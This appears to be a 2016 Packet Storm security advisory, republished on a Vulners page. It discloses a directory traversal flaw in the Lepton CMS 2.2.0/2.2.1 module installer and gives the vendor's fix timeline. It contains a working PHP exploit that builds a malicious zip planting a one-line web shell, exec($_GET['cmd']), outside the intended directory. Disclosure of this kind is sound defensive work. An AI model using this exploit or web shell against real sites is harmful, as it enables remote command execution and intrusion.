Lucene search
+L

Lepton CMS 2.2.0 / 2.2.1 Directory Traversal

🗓️ 16 Aug 2016 00:00:00Reported by hyp3rlinxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Lepton CMS 2.2.0 / 2.2.1 Directory Traversal vulnerability in module installatio

Code
`[+] Credits: John Page (HYP3RLINX)  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt  
  
[+] ISR: ApparitionSec  
  
  
  
Vendor:  
==================  
www.lepton-cms.org  
  
  
  
Product:  
=================================  
Lepton CMS 2.2.0 / 2.2.1 (update)  
  
LEPTON is an easy-to-use but full customizable Content Management System  
(CMS).  
  
  
Vulnerability Type:  
============================  
Archive Directory Traversal  
  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
Vulnerability Details:  
=====================  
  
Lepton has feature that lets users install new modules, if malicious user  
uploads an archive and the module is not valid it  
will generate an error. However, the malicious archive will still get  
decompressed and no check is made for ../ characters in  
the file name allowing in arbitrary PHP files to be placed outside the  
intended target directory for installed modules. This can  
then be used to execute remote commands on the affected host system.  
  
e.g.  
  
We get error message as below.  
  
under "Add Ons" tab Install Module.  
Invalid LEPTON installation file. Please check the *.zip format.[1]  
  
Archive still gets decompressed and the malicious file is moved outside of  
the intended target directory, by using ../ in file name.  
  
  
Exploit code(s):  
===============  
  
<?php  
#Archive Directory Traversal to RCE exploit  
#==============================================  
  
if($argc<2){echo "Usage: <filename>";exit();}  
$file_name=$argv[1];  
  
$zip = new ZipArchive();  
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);  
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php  
exec($_GET["cmd"]); ?>');  
$zip->close();  
  
echo "Malicious archive created...\r\n";  
echo "========= hyp3rlinx ============";  
?>  
  
  
  
  
Disclosure Timeline:  
===========================================================  
Attempted Vendor Notification: June 11, 2016 (No replies)  
Vendor Notification on July 12, 2016 ( thanks Henri Salo )  
Vendor Acknowledgement: July 13, 2016  
Vendor fixes: July 14, 2016  
Vendor release version 2.2.2 : August 12, 2016  
August 15, 2016 : Public Disclosure  
  
  
  
  
Exploitation Technique:  
=======================  
Local  
  
  
  
Severity Level:  
================  
High  
  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the  
information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author  
prohibits any malicious use of security related information  
or exploits by the author or elsewhere.  
  
HYP3RLINX  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation